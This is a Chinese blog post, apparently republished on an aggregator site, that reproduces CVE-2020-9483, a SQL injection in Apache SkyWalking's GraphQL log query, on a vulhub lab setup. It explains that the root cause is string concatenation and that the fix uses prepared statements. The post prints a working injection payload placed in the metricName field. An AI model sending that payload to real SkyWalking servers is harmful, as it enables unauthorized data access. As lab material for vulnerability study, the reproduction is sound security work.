CVE-2020-9483 apache skywalking SQL注入漏洞

这篇具有很好参考价值的文章主要介绍了CVE-2020-9483 apache skywalking SQL注入漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

漏洞概述

当使用H2 / MySQL / TiDB作为Apache SkyWalking存储时,通过GraphQL协议查询元数据时,存在SQL注入漏洞,该漏洞允许访问未指定的数据。 Apache SkyWalking 6.0.0到6.6.0、7.0.0 H2 / MySQL / TiDB存储实现不使用适当的方法来设置SQL参数。

环境搭建

拉取vulhub

git clone https://github.com/vulhub/vulhub.git

搭建镜像

cd /vulhub/skywalking/8.3.0-sqli
docker-compose up -d

CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库
访问8080端口
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库

漏洞复现

在首页刷新即可抓到报文。
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库

输入payload

{
    "query":"query queryLogs($condition: LogQueryCondition) {
  queryLogs(condition: $condition) {
    total
    logs {
      serviceId
      serviceName
      isError
      content
    }
  }
}
",
    "variables":{
        "condition":{
            "metricName":"INFORMATION_SCHEMA.USERS union all select h2version())a where 1=? or 1=? or 1=? --",
                        "endpointId":"1",
                    "traceId":"1",
                    "state":"ALL",
                    "stateCode":"1",
            "paging":{
                "pageSize":10
            }
        }
    }
}

查看返回结果
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库

漏洞复现成功

漏洞原理

源码:https://github.com/apache/skywalking/releases/tag/v8.3.0
graphql是skywalking的一种查询协议,如果请求以下列JSON给出:

{
  bookById(id: "book-1"){
    id
    name
    pageCount
    author {
      firstName
      lastName
    }
  }
}

则返回结果为:

{
  "bookById": {
    "id":"book-1",
    "name":"Harry Potter and the Philosopher's Stone",
    "pageCount":223,
    "author": {
      "firstName":"Joanne",
      "lastName":"Rowling"
    }
  }
}

通常,graphql中会对对象类型进行定义:

type Query {
  bookById(id: ID): Book
}

type Book {
  id: ID
  name: String
  pageCount: Int
  author: Author
}

type Author {
  id: ID
  firstName: String
  lastName: String
}

此次产生漏洞的queryLogs为:
oap-server\server-query-plugin\query-graphql-plugin\src\main\resources\query-protocol\log.graphqls:
(这里不知道为什么下载的源码中没有,只能跑到github上看)
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库

oap-server\server-query-plugin\query-graphql-plugin\src\main\java\org\apache\skywalking\oap\query\graphql\resolver\LogQuery.java
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库

oap-server\server-storage-plugin\storage-jdbc-hikaricp-plugin\src\main\java\org\apache\skywalking\oap\server\storage\plugin\jdbc\h2\dao\H2LogQueryDAO.java
CVE-2020-9483 apache skywalking SQL注入漏洞,漏洞复现,apache,skywalking,sql,数据库

采取了直接拼接的方式。

5、修复方法
修复后使用了占位符,即预编译。文章来源地址https://www.toymoban.com/news/detail-724790.html

到了这里,关于CVE-2020-9483 apache skywalking SQL注入漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [ vulhub漏洞复现篇 ] Drupal<7.32 Drupalgeddon SQL注入漏洞(CVE-2014-3704)

    👨‍🎓 博主介绍:大家好,我是 _PowerShell ,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋 🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋 🙏作者水平有

    2023年04月14日
    浏览(50)
  • [春秋云镜wp]CVE-2022-28060 CVE-2022-26201 Victor CMS v1.0存在sql注入漏洞复现拿flag

     访问题目提示的login.php,登录框登录抓包,保存为2.txt,sqlmap跑起来 时间3分钟左右,自己手动输入Y后回车,跑完根据提示打开文件夹,拿到flag  动下小手来个赞吧~~~  和上面同类型,点击首页上面banner的admin,未授权直接进入,找到如图的注入点   抓包,保存为3.txt,s

    2024年02月11日
    浏览(54)
  • CVE-2020-14882&14883漏洞复现

    漏洞介绍   在2020年10月的更新中,Oracle官方修复了两个长亭科技安全研究员提交的安全漏洞,分别是CVE-2020-14882和CVE-2020-14882。 CVE-2020-14882 允许远程用户规避控制台组件中的身份验证。导致此漏洞的原因是服务器 URL 的路径遍历黑名单配置不当,可以在 WebLogic HTTP 访问的处理

    2023年04月24日
    浏览(42)
  • CVE-2020-15778 OpenSSH命令注入漏洞

    预备知识 漏洞描述 OpenSSH8.3p1及之前版本中scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`)。攻击者可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中gets

    2024年02月09日
    浏览(46)
  • CVE-2020-1938 Tomcat文件包含漏洞复现

    Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件。若目标服务器同时存在文件上传功能,攻击者可进一步实现远程代码执行。AJP(Apache JServ Protocol)是定向包

    2024年02月08日
    浏览(49)
  • Docker 容器逃逸漏洞 (CVE-2020-15257)复现

    漏洞概述 containerd是行业标准的容器运行时,可作为Linux和Windows的守护程序使用。在版本1.3.9和1.4.3之前的容器中,容器填充的API不正确地暴露给主机网络容器。填充程序的API套接字的访问控制验证了连接过程的有效UID为0,但没有以其他方式限制对抽象Unix域套接字的访问。这

    2024年02月10日
    浏览(40)
  • 【网络安全---漏洞复现】Tomcat CVE-2020-1938 漏洞复现和利用过程(特详细)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 Apache Tomcat文件包含漏洞(CNVD-2020-10487/CVE-2020-1938)。该漏洞是由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的

    2024年02月08日
    浏览(54)
  • CVE-2020-17518 flink任意文件上传漏洞复现

    Apache Flink 是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 编号:CVE-2020-17518 Flink 1.5.1引入了REST API,但其实现上存在多处

    2024年02月10日
    浏览(43)
  • 漏洞复现Tomcat系列弱口令、CVE-2017-12615、CVE-2020-1938

    Tomcat支持在后台部署war文件,可以直接将webshell部署到web目录下。如果可以利用弱口令进去的,可直接getshell vulhub搭建环境 访问靶场地址,使用tomcat/tomcat弱口令登录后台 制作webshell.war 上传shell.war,访问试一下并用冰蝎连接试一下 成功拿到shell权限 Apache Tomcat 7.0.0版本至7.0.

    2024年02月12日
    浏览(38)
  • CVE-2020-14750 漏洞复现和Linux打补丁详解

    使用的工具整理:jdk1.79,weblogic安装包(中文版),两个补丁包 链接:https://pan.baidu.com/s/1ehrO4fjv7beth2fp06XXPA?pwd=z8ju 提取码:z8ju 漏洞环境搭建参考如下博客: [(64条消息) 详细教程]jdk官方下载,Linux安装jdk1.7,图文解说,一看就会_gosin1994的博客-CSDN博客_linux 1.7 官网下载 (64条消

    2024年02月05日
    浏览(35)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包